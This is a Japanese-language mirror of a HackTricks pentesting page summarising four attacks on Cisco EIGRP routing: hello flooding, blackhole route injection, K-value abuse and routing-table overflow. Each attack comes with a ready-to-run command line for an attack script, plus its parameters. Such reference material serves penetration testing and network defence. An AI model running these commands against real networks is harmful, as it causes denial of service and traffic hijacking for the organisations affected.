mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 08:01:00 +00:00
4.2 KiB
4.2 KiB
EIGRP攻撃
htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- 独占的なNFTsコレクションであるThe PEASS Familyを発見する
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @hacktricks_liveでフォローする
- ハッキングトリックを共有するには、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。
これは https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 で公開された攻撃の要約です。詳細についてはそちらをご覧ください。
偽EIGRP隣接攻撃
- 目的: EIGRPハローパケットをフラッディングしてルーターのCPUを過負荷にし、サービス拒否(DoS)攻撃を引き起こす可能性がある。
- ツール: helloflooding.pyスクリプト。
- 実行:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- パラメータ:
--interface
: ネットワークインターフェースを指定します。例:eth0
。--as
: EIGRP自律システム番号を定義します。例:1
。--subnet
: サブネットの場所を設定します。例:10.10.100.0/24
。
EIGRPブラックホール攻撃
- 目的: 偽のルートを注入してネットワークトラフィックの流れを妨害し、トラフィックが存在しない宛先に向けられるブラックホールを作成する。
- ツール: routeinject.pyスクリプト。
- 実行:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- パラメータ:
--interface
: 攻撃者のシステムインターフェースを指定します。--as
: EIGRP AS番号を定義します。--src
: 攻撃者のIPアドレスを設定します。--dst
: ターゲットサブネットIPを設定します。--prefix
: ターゲットサブネットIPのマスクを定義します。
K-Values悪用攻撃
- 目的: 変更されたK-Valuesを注入することでEIGRPドメイン内で連続的な障害と再接続を作成し、実質的にDoS攻撃を引き起こす。
- ツール: relationshipnightmare.pyスクリプト。
- 実行:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- パラメータ:
--interface
: ネットワークインターフェースを指定します。--as
: EIGRP AS番号を定義します。--src
: 正規のルーターのIPアドレスを設定します。
ルーティングテーブルオーバーフローアタック
- 目的: 偽のルートを大量にルーティングテーブルにフラッディングして、ルーターのCPUとRAMを過負荷にする。
- ツール: routingtableoverflow.pyスクリプト。
- 実行:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- パラメータ:
--interface
: ネットワークインターフェースを指定します。--as
: EIGRP AS番号を定義します。--src
: 攻撃者のIPアドレスを設定します。